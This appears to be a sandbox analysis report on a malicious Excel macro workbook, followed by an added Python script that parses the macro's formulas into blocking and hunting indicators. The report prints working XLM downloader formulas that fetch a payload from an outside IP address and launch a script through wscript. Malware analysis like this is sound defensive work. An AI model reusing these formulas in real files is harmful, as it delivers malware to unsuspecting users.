General
Target
97a60be3dee6ac2aaab0aa24ada9490b
Size
6KB
Sample
231222-qbs2sadfbk
MD5
97a60be3dee6ac2aaab0aa24ada9490b
SHA1
6094231dea0e463c0301e425b9a337c6240d2474
SHA256
6dd6c9edb655b3001a9381a76ebebd680427e6f09be0c237a94ccf365c83918d
SHA512
9f43ce54d26ee817c99e62aae4c44eee0a501c827aeaba11acb9af71880ac8dc77ef4c4c4d0f20f885dc52d06711734dd97dd94fface51e0b47dcd459b0b91f2
SSDEEP
192:NDSJluSxbrA2OmmfRo8UhHFBFYuGb98ysSwF+c:N8uOM2w+1FYzb98y/w1
Static task
static1
Behavioral task
behavioral1
Sample
97a60be3dee6ac2aaab0aa24ada9490b.xlsm
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
97a60be3dee6ac2aaab0aa24ada9490b.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
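The extracted formulas are a short Excel 4.0 (XLM) macro chain: two CALL formulas invoke URLDownloadToFileA from urlmon.dll to fetch a URL into C:\~\pes.msi (the second call targets google.com/index.php with the same destination), EXEC launches wscript on C:\zer\spp.vbs, and HALT stops the macro. Note that the path handed to EXEC is not the file the CALLs download; the report does not show how spp.vbs is produced. The following Python script is an added example, not part of the sandbox report or of any vendor tooling: it parses formulas of this shape, recovers the download URL and destination from the URLDownloadToFileA argument positions, collects EXEC command lines, checks the CALL type string against the argument count, and returns the indicators to block or hunt for. The sample input is the four formulas from this report, reproduced one per line; the parser, the XlmChain type and its heuristics are assumptions of the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Set, Tuple

# Constructed input: the four XLM formulas listed in the report above, one per
# line. Everything in this block is an added example; it is not code from the
# sandbox report or from any vendor tooling.
SAMPLE_FORMULAS = r'''
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
'''

_FORMULA_RE = re.compile(r'^=([A-Za-z.]+)\((.*)\)$')
# One argument: a quoted string (XLM escapes an embedded quote as "") or a bare token.
_ARG_RE = re.compile(r'"((?:[^"]|"")*)"|([^,\s]+)')


def parse_formula(line: str) -> Tuple[str, List[str]]:
    """Split '=NAME(1,"b")' into ('NAME', ['1', 'b']); string arguments are unquoted."""
    m = _FORMULA_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an XLM formula: {line!r}")
    args = []
    for am in _ARG_RE.finditer(m.group(2)):
        if am.group(1) is not None:
            args.append(am.group(1).replace('""', '"'))
        else:
            args.append(am.group(2))
    return m.group(1).upper(), args


@dataclass
class XlmChain:
    downloads: List[Tuple[str, str]] = field(default_factory=list)  # (url, local path)
    commands: List[str] = field(default_factory=list)               # EXEC command lines
    halts: bool = False
    warnings: List[str] = field(default_factory=list)

    def iocs(self) -> Set[str]:
        """Network and host indicators worth blocking or hunting for."""
        out = {url for url, _ in self.downloads}
        out.update(path for _, path in self.downloads)
        out.update(self.commands)
        return out


def analyze(formulas: str) -> XlmChain:
    chain = XlmChain()
    for line in formulas.splitlines():
        if not line.strip():
            continue
        name, args = parse_formula(line)
        if name == "CALL" and len(args) >= 3:
            dll, func, types, call_args = args[0].lower(), args[1], args[2], args[3:]
            # In CALL's type string the first character is the return type and each
            # later character describes one argument, so the call should pass
            # len(types) - 1 arguments. A mismatch usually means a mangled or
            # obfuscated formula, so flag it instead of trusting the positions.
            if len(call_args) != len(types) - 1:
                chain.warnings.append(
                    f"{func}: {len(call_args)} argument(s) but type string {types!r}")
            if dll in ("urlmon", "urlmon.dll") and func.lower() == "urldownloadtofilea":
                # URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB):
                # the URL and destination are the 2nd and 3rd arguments.
                if len(call_args) >= 3:
                    chain.downloads.append((call_args[1], call_args[2]))
                else:
                    chain.warnings.append(f"{func}: too few arguments to recover URL/path")
        elif name == "EXEC" and args:
            chain.commands.append(args[0])
        elif name == "HALT":
            chain.halts = True
    return chain


if __name__ == "__main__":
    result = analyze(SAMPLE_FORMULAS)
    for url, path in result.downloads:
        print(f"download {url} -> {path}")
    for cmd in result.commands:
        print(f"exec     {cmd}")
    print("halt" if result.halts else "no HALT (execution continues)")
    for w in result.warnings:
        print("warning:", w)
```

Running it on the report's formulas yields two download entries sharing the destination C:\~\pes.msi, one EXEC command, and no type-string warnings (JJCCJJ describes one return value and five arguments, matching the five passed). The IOC set therefore contains both URLs, the drop path and the wscript command line; when feeding these to blocking rules, remember that google.com/index.php is a benign host used here as a fallback target and should be hunted on, not blocked.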
Targets
Target
97a60be3dee6ac2aaab0aa24ada9490b
Score 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.